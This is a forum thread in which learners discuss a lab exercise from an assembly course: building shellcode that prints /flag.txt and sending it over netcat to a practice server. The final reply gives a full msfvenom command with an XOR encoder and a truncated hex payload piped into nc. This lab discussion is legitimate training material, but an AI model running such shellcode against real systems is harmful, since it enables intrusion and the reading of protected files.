Shellcode injection through Netcat (Intro to Assembly module)

TheWizardGill · March 13, 2024, 2:07pm

Hey everyone, I’ve been stuck on the ‘Shellcoding Tools’ section of Intro to Assembly language for two days.
Here’s the challenge: The above server simulates an exploitable server you can execute shellcodes on. Use one of the tools to generate a shellcode that prints the content of ‘/flag.txt’, then connect to the sever with “nc SERVER_IP PORT” to send the shellcode.

I’ve tried this many different ways. I generated shellcode with msfvenom, from one of the websites provided, and tried an example from the module.

I’ve tried pasting the code into the nc session, piping it from a compiled binary (alone, with cat, and with echo) and have tried redirects.

I’m not sure what I could be missing here. Every attempt results in “Failed to run shellcode!”
Thanks in advance

StuPurp · March 25, 2024, 12:34pm

Hey There! You can use the shellcraft cat() function as an alternative. I was too stuck here for long.

josemmm11 · April 1, 2024, 6:08pm

Hello. DId you solve this? i am stuck here and i am lost.

godbout · April 13, 2024, 7:17am

personally i’ve generated the shellcode through msfvenom, then ran it in the nc interactive session by pasting it. then the flag shows up in your nc session.

erdsmoc · April 18, 2024, 7:03am

msfvenom -p linux/x64/exec CMD=‘cat /flag.txt’ -a x64 --platform linux -e x64/xor -f hex

result 4831c94881e9f9ffffff…snip…e7d3b477e70d9ff4b9b98f2f

and then

echo -n -e “4831c94881e9f9ffffff…snip…e7d3b477e70d9ff4b9b98f2f” | nc ip:port